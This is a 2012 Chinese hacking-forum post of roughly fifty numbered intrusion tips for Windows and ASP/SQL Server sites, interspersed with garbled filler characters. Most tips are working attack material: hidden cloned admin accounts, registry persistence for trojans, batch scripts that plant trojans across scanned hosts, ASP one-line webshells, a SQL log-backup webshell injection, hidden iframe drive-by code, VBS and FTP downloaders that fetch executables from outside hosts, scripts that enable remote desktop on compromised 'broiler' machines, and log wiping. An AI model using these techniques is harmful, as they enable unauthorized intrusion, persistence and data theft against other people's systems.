找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2242|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,, F5 ?- R+ b' s! }7 h
cacls C:\windows\system32 /G hqw20:R- _4 W. G6 [$ C3 V- a
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入' T* }( H/ T2 A& l5 }
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F# Y/ ?6 Y* V1 }9 L

: q- c- V! E  b$ i9 B4 g2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
' R% U( Z: `) M/ R+ y' `3 k# {* j: H. d! \) r* r+ {
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。5 p8 p" F9 i) @7 q' N
+ X: a; O% j- H6 d# V
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
2 K( t4 [/ K; D
) L7 ^+ u. Z: f0 S  m& M  k5、利用INF文件来修改注册表- C  a2 w& T& a$ ~- M* L, [# D$ {* S
[Version]5 E. g* x' y$ c0 Q. ]- l8 h
Signature="$CHICAGO$"0 U% \. T% K3 o. z! q% W7 L3 d
[Defaultinstall]
/ \0 L4 x( G' ?4 U: XaddREG=Ating7 f% |* t+ P( ~" [  U. R
[Ating]  y$ @* m! f! [7 Q
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
: G% }# ~) L+ I; {  `8 ~' A以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
! g* @8 ]" X. b% P7 H5 Jrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径* s. S& _) o, l
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
; k5 x- J! L( \( rHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
( p# Y8 I: T+ v# HHKEY_CURRENT_CONFIG 简写为 HKCC- u' i0 l' U+ _! Z7 H! F9 N# `1 [
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值/ h* c$ }! Y! }
"1"这里代表是写入或删除注册表键值中的具体数据; `; E3 J! L8 U6 _. j

. b* l( ^1 p: n" [+ M; m6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
+ ]6 s$ ?5 C% l. X! a多了一步就是在防火墙里添加个端口,然后导出其键值) ]" C. B: o, A3 k' e; q" E8 ]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]: Y9 E3 ^, G1 h$ [5 v
4 |, q8 U, |1 t# U$ B
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
5 x6 A0 o! B3 j) A4 W. v在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。& G+ W# N/ y! C& S& J) E

' _1 x% Z% p- r2 j2 S. n2 ~8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
; N- G  F6 u5 j' e( _; \  o, I: h$ n! U1 g
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
. [( J# |7 r3 D7 q* ~( E3 [- S& {可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
& g6 V9 ]% ]) i/ x- N. J8 O2 B5 @5 Z* L( D/ Y2 H+ y5 @: q
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
! n1 K+ M, V8 D' Q
  f* K1 N( w. O% z1 d. K& Q$ X11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,& P3 T0 j; a4 F
用法:xsniff –pass –hide –log pass.txt7 T& X( g1 l3 \5 W2 o5 z2 W' d% I
9 F$ H, R& T, x& k
12、google搜索的艺术' L/ M" }# p: e: k
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
' \5 x& ]3 W9 N% c) B或“字符串的语法错误”可以找到很多sql注入漏洞。4 K2 \5 [2 g  L8 ~0 a% m$ J

( @+ D; T# g8 t4 C13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
! O6 f8 c+ n% c! ^  |* a- v  B$ s5 t, W. |6 [$ i1 Y
14、cmd中输入 nc –vv –l –p 1987
" s7 l# \  R: @7 r做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 ]7 K) Q% M( I& `# P
0 e  F1 N3 V2 E; d7 H15、制作T++木马,先写个ating.hta文件,内容为' S" o4 R( l7 K4 ?9 L( U$ P& J$ _6 R
<script language="VBScript">
5 c3 M7 B( m: L4 c$ K2 Xset wshshell=createobject ("wscript.shell" )8 ]. I) ]/ T- D6 z- p1 J
a=wshshell.run("你马的名称",1)9 T8 P0 h1 A6 k& I* d" X  V/ @
window.close
6 U; X! R- i2 x3 d</script>+ j9 q  [2 ]8 ]' m5 A8 \
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。, ?% N; U" \( w

3 @  t4 {0 a: q/ v7 k9 ]16、搜索栏里输入6 l# T2 s$ |1 B& a: z- {! N* @
关键字%'and 1=1 and '%'='% N  b1 S, e4 n' B( j% k
关键字%'and 1=2 and '%'='8 R7 G. o7 T( E' I
比较不同处 可以作为注入的特征字符
& G7 n% H  R* A
8 w3 J6 a7 K% T  L. h* V0 E! u17、挂马代码<html>6 C# P2 g" b% S
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
8 y7 U# O0 q: v& S  n$ {$ C</html>. l3 I: n2 [1 J* |
1 ~* l$ F+ P: g- p) f. ?
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
+ v7 U; V8 f; y# b. K0 Vnet localgroup administrators还是可以看出Guest是管理员来。
5 c- Q. b  G+ q4 p# o& }; L* U- v, Y
" e6 m8 _0 |+ a" l+ ?0 B6 [19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
# i/ Q' m9 W+ P/ z; t用法: 安装: instsrv.exe 服务名称 路径3 ]9 a# e/ K1 X( H2 w" |
卸载: instsrv.exe 服务名称 REMOVE6 Y6 \) g$ ]! h& @

( a/ d* I3 d" i" Q2 k9 g
. @0 Z% t7 q3 J$ u21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
5 ]2 P( P; \) ?不能注入时要第一时间想到%5c暴库。
4 I$ e- V3 z: b; {6 L, g: g0 I
8 G$ O3 p$ f/ j7 j2 }22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~! W$ p: T; c- v
; Q; w1 }5 @8 q( {" b& o- c1 {
23、缺少xp_cmdshell时
$ A7 k- r  {9 L9 o: f" u尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
( E7 s1 {; F  s# j9 b假如恢复不成功,可以尝试直接加用户(针对开3389的)& u0 w( J0 l! {
declare @o int: c# K; L3 _# W9 X" C. @
exec sp_oacreate 'wscript.shell',@o out
! l$ V2 |: F' l* _exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
; ]1 b" C- g( `- x/ R2 `8 q$ ]8 Z4 a( x  ?  u' w0 l9 J9 M
24.批量种植木马.bat
( |0 U; Q, K+ b6 T# rfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. r# p7 q& S) e* ~- I7 Zfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
1 ^, p- f6 @" f4 v7 e' t0 X( A扫描地址.txt里每个主机名一行 用\\开头) p3 G6 c( F* ^/ h4 n' M3 q- B
5 {6 D, e6 z. L& I/ Z4 I
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
" `$ l, V9 d  X3 L  V& K0 L1 o0 }
* ^  U( j% c- k6 |- J1 L* l- k26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
2 ^/ |7 }. N4 V4 z将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
  N7 ^1 B# \% a5 s/ I. s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
( k: r4 r! g3 i: R! y% s! G0 L9 J" P
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
) ^7 ^( r2 H# [$ W. ?, E然后用#clear logg和#clear line vty *删除日志8 c$ M0 Y& i8 l% i# {, f
/ O% m3 W# F) p4 c& U0 z& [
28、电脑坏了省去重新安装系统的方法5 y0 G) G% ]* o6 k" g
纯dos下执行,
  W! H) D# w$ V6 @0 F% U; w9 N, Q7 Zxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config8 P+ B: z9 r5 X" f) m: N+ V
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
& S, F, q- i* y9 i1 t1 r
. A8 T  b# A  w* @9 l" ?8 j0 Q29、解决TCP/IP筛选 在注册表里有三处,分别是:
0 K- R+ F+ A7 y3 Z4 n0 lHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
4 h( X: s% s" l, w' aHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 p0 ~7 d3 p. Z' x2 E" X
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) {8 n# X+ M; x
分别用
5 o8 Z/ _) t& I3 t' K  u8 |regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 C6 }1 j. F# R" P2 d/ [
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip, ?8 @2 j) W/ F1 G
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
+ I$ f! f" p: |; ?7 @0 \; s命令来导出注册表项
- E3 h! N  C) a) d; M$ B0 H然后把三个文件里的EnableSecurityFilters"=dword:00000001,
6 W$ \6 ?% a2 [! J& f8 E: m改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用5 Z% a# N& k9 ]7 ^2 E
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。! }  D/ q( F# L( Y4 y  L
+ i* ^' @7 S1 w, i7 s9 n/ V
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 `( p+ ~9 h) V3 L4 ^; C) Z& j; M3 \, B
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
/ f5 t: E4 e. {+ Y! u2 f) i7 b+ q+ T4 a) p) t
31、全手工打造开3389工具6 v" R  H7 @  L. A: w% Y
打开记事本,编辑内容如下:
2 q8 w. J  p  K+ ~% q3 C4 Wecho [Components] > c:\sql
: J/ v2 |; U% B' B7 yecho TSEnable = on >> c:\sql( {$ X, k* l* z/ d+ H2 q+ i
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 y( t# W7 L0 B  W# f; [, u. p5 S编辑好后存为BAT文件,上传至肉鸡,执行" P/ D/ X+ b) H* Y" c# f

  t$ E! [3 S* p32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马0 K, M- q1 }' q( J) S7 f
* N) V7 w  q0 u% E
33、让服务器重启5 F# N0 R, W- d  {( Z
写个bat死循环:
  r2 K2 U/ ]5 a, N' Y3 m: n@echo off6 i2 i" g) |' q4 p7 _- w5 o# e
:loop1
3 X# s% D3 j1 Xcls& M0 l' q' l: X1 X; {
start cmd.exe
# J1 \' P, J; z- K# f3 Jgoto loop1  z1 a) A8 r' V" v
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启$ N( y5 Z0 [' c  l4 w; K+ ~- l0 O: w

0 f- t, K" N+ h7 c+ ~) n34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,3 J3 z4 B" U/ V3 P9 h: z  O
@echo off
0 x" q& i* h: S! j* d, l5 sdate /t >c:/3389.txt3 X2 C: U1 E( ]/ Y' M1 c
time /t >>c:/3389.txt* L% v+ O4 G/ z& F7 W3 ~
attrib +s +h c:/3389.bat
3 x% G- J- Z# P* e1 n% Lattrib +s +h c:/3389.txt0 M5 o4 p* _0 f9 Q8 g0 S! n
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
0 u5 c8 g8 ~3 d) ?并保存为3389.bat0 G( u: N; x: Y/ I$ c, c
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
1 }( }1 @( `; S- @& D: M0 R& ?. E$ z$ i
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
3 h1 r2 C/ ?. x# h; [start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
9 E, f1 |$ C) m! A6 }- A. {8 G  @' D4 a输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。$ P2 `. c5 L+ K. T4 Q+ _

. a& g% Q4 x2 A) _; I- N36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
# m/ N" p6 C- y7 H& W  m% {echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址! t0 H2 `  J4 i. m) w
echo 你的FTP账号 >>c:\1.bat //输入账号
5 G' `2 p$ I2 j9 X) I/ N. eecho 你的FTP密码 >>c:\1.bat //输入密码# c/ s/ x: k$ K* e8 i% W
echo bin >>c:\1.bat //登入
- [! M; a% C) J$ |, J& W2 Zecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
4 x0 Z! \6 Z& Y9 @1 x- Pecho bye >>c:\1.bat //退出
: Z* d! X8 p( J1 s8 q5 I1 F1 j然后执行ftp -s:c:\1.bat即可7 A/ r; U. ~$ h. Q. q* z1 S
# S+ u8 v: `& D
37、修改注册表开3389两法
* G  v( o* K  G/ `2 B(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表/ p) t& A: h, l
echo Windows Registry Editor Version 5.00 >>3389.reg
5 A/ q; D$ c$ i! @# l7 s7 Jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
- I$ A' o# v3 C) b/ K5 fecho "Enabled"="0" >>3389.reg! S( C4 z9 j0 z0 e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
" K5 P8 j& p. _! c6 XNT\CurrentVersion\Winlogon] >>3389.reg+ h, a* X- Z. _9 d1 V0 t
echo "ShutdownWithoutLogon"="0" >>3389.reg
) J" d6 S  y3 f& V1 T+ lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
$ g4 Y& W0 H  U2 S0 i) h9 r& j>>3389.reg
2 j  ~% w  v6 uecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
5 ?7 _. m& v: D" r" Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
0 \5 }8 E" M% Q, C: N7 m>>3389.reg
( ]0 f1 o2 @# \+ T1 d% ]echo "TSEnabled"=dword:00000001 >>3389.reg8 F6 M; s; v8 q% B* U2 f: y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg6 X4 _5 t8 q& o+ d$ Z
echo "Start"=dword:00000002 >>3389.reg
& v! k! U) j# w0 C. cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; k2 [. v7 r' G$ H- q1 \1 g- ~
>>3389.reg1 i$ g- }! Q0 P- v4 z$ R
echo "Start"=dword:00000002 >>3389.reg# q9 w3 w7 g8 y) [! D5 U
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 Q+ m, |* H6 r% }$ a4 N- C8 Iecho "Hotkey"="1" >>3389.reg
. @+ k/ z4 ^' L/ G7 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 w) D& e* O# r! A, E
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
. O8 D- H' ]7 o1 Zecho "PortNumber"=dword:00000D3D >>3389.reg
- q2 [2 i0 f  @; E( Y) Y; Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ l  Y! t2 F# J- g9 X8 |+ U
Server\WinStations\RDP-Tcp] >>3389.reg) w: {3 H1 \  T9 E
echo "PortNumber"=dword:00000D3D >>3389.reg
1 j) l0 A2 `! |8 D3 ^& h* Z把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
) o& k: U! z& g$ T& ^5 E(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)$ R, D) G' P! L$ f( v
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效# c# w7 j2 I* t' j/ L3 G
(2)winxp和win2003终端开启% G" F- w. D  H* C
用以下ECHO代码写一个REG文件:
7 S& T2 T) r, l4 t- w2 {9 Kecho Windows Registry Editor Version 5.00>>3389.reg5 ]- u% S, l6 {+ I& p1 [) d
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
  r& _3 U  [. j( g9 MServer]>>3389.reg  n/ J; d' p3 y- |' g$ F2 k
echo "fDenyTSConnections"=dword:00000000>>3389.reg% Y/ b' u, \: r1 }9 a' ^( k! n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( q" n- e$ w/ i5 e
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  L6 I) m5 b0 v. ^, `3 i/ m+ ]echo "PortNumber"=dword:00000d3d>>3389.reg+ d! V( R# ]' H+ L9 I! j, ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" T5 C0 ^2 u. k' K5 r. ^& x  l/ SServer\WinStations\RDP-Tcp]>>3389.reg6 v& x, e" [% N4 i- K
echo "PortNumber"=dword:00000d3d>>3389.reg! U- H. p( w  z& Y0 N$ s# n8 l
然后regedit /s 3389.reg del 3389.reg8 ]' y7 P" O5 `- O6 }/ g* V
XP下不论开终端还是改终端端口都不需重启  G0 v  G9 A# B. h3 C* _* r5 \% M
2 o; A% Z3 K" E) r; ^" C
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
! v# K- Z& H( f' e$ I; G3 X- D用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'# w' M8 \' u2 p' y5 y

" v1 t6 e5 X% r0 C39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!7 D' T8 K; B' ?* k8 U3 A
(1)数据库文件名应复杂并要有特殊字符
/ j' e0 O5 S5 F( x5 B7 H4 A4 L4 y(2)不要把数据库名称写在conn.asp里,要用ODBC数据源  E2 C) t3 L, ?9 B8 g& l$ n: l8 F# n4 X
将conn.asp文档中的9 `# [* W2 o2 J6 z
DBPath = Server.MapPath("数据库.mdb")6 u) n/ Q! K4 m6 n; u! v8 s
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath4 `3 d) M. e% t9 e( O2 l
, g8 z* d& d( K' C$ ~
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置  X5 G# Q- ^# M% ?5 [
(3)不放在WEB目录里
0 a9 E7 `2 Q- l9 h
, b) G; t* W0 i: b  X: c0 ^40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
2 x2 S" b. C2 T  i1 K0 _: n可以写两个bat文件' b9 R5 U7 X* D- V. `% Q
@echo off
0 U* r, t' B3 w0 [) _  E@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, f( K6 [) M* `5 }" ~; x@del c:\winnt\system32\query.exe0 b& y- q1 y- I- L; Z& q" `+ D% T
@del %SYSTEMROOT%\system32\dllcache\query.exe
. T# r4 X/ U" K, v0 c7 N@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的4 a7 E- \# m) H# _% {

8 F. ~9 Z9 U- S( V" \$ `@echo off
! j6 l, o) w: S) B; N8 j@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
$ |: Q: W" X  g@del c:\winnt\system32\tsadmin.exe3 b' s! m+ l# `+ }/ K3 \
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
: K3 }& x9 A" `
$ H! @5 p, g! F5 R: t6 ^8 P41、映射对方盘符
) m/ S7 g+ l, r) u. jtelnet到他的机器上,) x9 o# R- s3 u
net share 查看有没有默认共享 如果没有,那么就接着运行1 o" c) j1 z5 W6 \( X7 Q
net share c$=c:
) A5 a$ s3 ^/ O+ |8 B: U2 e7 Xnet share现在有c$
" [9 `- Q% u9 z  J9 B6 o8 ^. D在自己的机器上运行
* w. z/ ?) N4 rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
" h3 \" v3 }# b- w) ~# k! E, V  J. z$ \7 @8 E" U( z
42、一些很有用的老知识) y! [- d( \- A0 z/ K; o: M1 h
type c:\boot.ini ( 查看系统版本 )
! h% s, u  ?2 l4 N. Knet start (查看已经启动的服务)) W" p% C& _& k" R
query user ( 查看当前终端连接 )6 F$ P2 O; w1 W" y9 o! G/ w
net user ( 查看当前用户 )4 s1 I+ u, b) e; ?! b9 c8 J
net user 用户 密码/add ( 建立账号 ); G: J$ v# b! r2 x$ f
net localgroup administrators 用户 /add (提升某用户为管理员). {) v6 E- ~% y  v
ipconfig -all ( 查看IP什么的 )
+ V( p; A4 \. cnetstat -an ( 查看当前网络状态 )* p* d! V9 |: h" C* f; I+ x
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
" ^" n# J3 o3 q% j" e克隆时Administrator对应1F41 T7 F! [+ r; U/ J/ f
guest对应1F5
+ {, [! ?! i' ]: n8 Atsinternetuser对应3E8
2 `+ |4 Y8 W9 X1 u9 \1 s0 b4 b: n9 i9 N% Q
43、如果对方没开3389,但是装了Remote Administrator Service
0 _( S0 d5 `- Y4 r3 Q用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接- z: ^  a8 R9 i
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& I1 F8 D: ]1 d; y& x0 l先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# d/ Y& w' \  L5 p; ^( `! P( p+ B- C% b6 g" |! G
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
) G! r' y  D- g5 Q9 I* t本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)$ E+ J7 a! i+ d" \2 O- e6 b/ q

3 o( r6 d- y2 H/ j5 t8 C' y/ k7 c5 z45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
% i8 K& G6 w8 I" d3 P0 W  Aecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open7 k0 R/ Y( _1 Y; E! m5 j  j
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =7 F# U% k  r  i% o9 f; z4 X6 `$ i: }
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
2 O+ \* S0 V3 V1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
/ `' Y, `  M8 [+ e5 f, \(这是完整的一句话,其中没有换行符), O) J( M. Q- _0 i: G" n
然后下载:( E9 v& _' A$ P1 s2 y4 v
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 u1 ?4 z* K/ n. z. v) d
! ~6 W: e1 z5 ]& H0 I6 i, i0 U46、一句话木马成功依赖于两个条件:1 z5 p. F, b, B5 e& L
1、服务端没有禁止adodb.Stream或FSO组件3 ?7 A7 I0 r9 }. t1 n) x
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
+ W  F' a, o5 L: n) k0 u0 B- F& k* b$ J
- ~7 z, s5 i" x5 Y5 f. Q47、利用DB_OWNER权限进行手工备份一句话木马的代码:7 Z1 i4 ]: |3 }+ }; w/ q  n
;alter database utsz set RECOVERY FULL--+ }9 D5 g( ^0 B& E$ d
;create table cmd (a image)--
- D, W# W7 M+ |* O;backup log utsz to disk = 'D:\cmd' with init--
% Z& \1 E, @' v* j8 K;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
! p# ~: ]+ o7 @;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
1 k2 R4 k2 t  s, _$ f* \/ {注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。: m& D& b* w/ B( C  ^3 x$ J

1 \( h: Q& F9 P1 o5 w/ a/ r. n5 f48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:3 O; T8 W& L  ^4 D0 {& t' O

. e/ F9 P- b1 W9 c2 z用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options$ M' [6 I: u- c
所有会话用 'all'。# p7 G0 Y' l+ u3 z( z
-s sessionid 列出会话的信息。  T1 z% c& \' ?2 D
-k sessionid 终止会话。$ B( y  e, [: n; _* H
-m sessionid 发送消息到会话。2 V& {- C- g# C/ K9 a1 m+ p* }8 I
3 y% d1 [* Y# m* \4 t2 V0 {# R
config 配置 telnet 服务器参数。
& Q. `9 W" J" T2 i# q4 P+ S4 z: p
) G  }9 V1 B: b3 C9 H. O& ncommon_options 为:5 j% L/ i5 H  V9 q
-u user 指定要使用其凭据的用户" v# t6 m- t9 M
-p password 用户密码' \$ E7 m" _: v& x8 u
( v; a0 u0 }7 j. @5 N$ C" t6 ~( i
config_options 为:- [- ]' }* I# Q7 @$ C
dom = domain 设定用户的默认域
8 f9 \" C9 T& F2 k( ?ctrlakeymap = yes|no 设定 ALT 键的映射  V4 H6 A' ?+ H5 G
timeout = hh:mm:ss 设定空闲会话超时值
2 Z0 e; R# f2 V( `timeoutactive = yes|no 启用空闲会话。* n' N( N9 ^5 l1 y8 r6 c, o. m
maxfail = attempts 设定断开前失败的登录企图数。
: b4 n) E  C% A2 Smaxconn = connections 设定最大连接数。8 B( m4 ?; A' D. {, g% h1 |
port = number 设定 telnet 端口。4 p$ O3 q5 P+ u! c
sec = [+/-]NTLM [+/-]passwd
  n: u& D% K) Z' J3 {: G+ k设定身份验证机构
& Y- L6 A$ z9 d2 e, ^0 S; dfname = file 指定审计文件名。: A) x3 q% t  {, G* h2 q
fsize = size 指定审计文件的最大尺寸(MB)。
* F' ]$ C( V4 }mode = console|stream 指定操作模式。
" ]5 x7 v/ N% V) ~$ Vauditlocation = eventlog|file|both7 @2 m6 r6 g; {1 t: }7 L9 h
指定记录地点
8 d8 S* d; h$ [: u8 gaudit = [+/-]user [+/-]fail [+/-]admin
1 H) d- N4 ]9 K( n4 Z2 `% P) i/ D/ {( e& j2 h# }
49、例如:在IE上访问:/ i5 e6 |0 |3 z+ x* p
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
2 P0 p3 {8 T3 ^. j3 \hack.txt里面的代码是:) s2 @( q: ^1 ^2 H$ A. G0 v- g
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">. H$ m/ H5 T: O' V8 l7 x
把这个hack.txt发到你空间就可以了!) m& d& X6 Y$ `4 w# R  I
这个可以利用来做网马哦!* r2 e+ Y. p% e3 F7 I

4 ^( N0 C# F1 }+ L, u50、autorun的病毒可以通过手动限制!
7 d  M& w! U) d. j1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!" j* u) D* J9 C* e; Y
2,打开盘符用右键打开!切忌双击盘符~1 W& M" X. b7 P. ?0 p* @
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
4 a7 a2 v5 M) o# g6 S2 t6 d- Y( Y: i  l6 W4 w) \% e9 h
51、log备份时的一句话木马:
, P' j- J5 K0 k9 Aa).<%%25Execute(request("go"))%%25>- P1 ^  o; |4 j
b).<%Execute(request("go"))%>
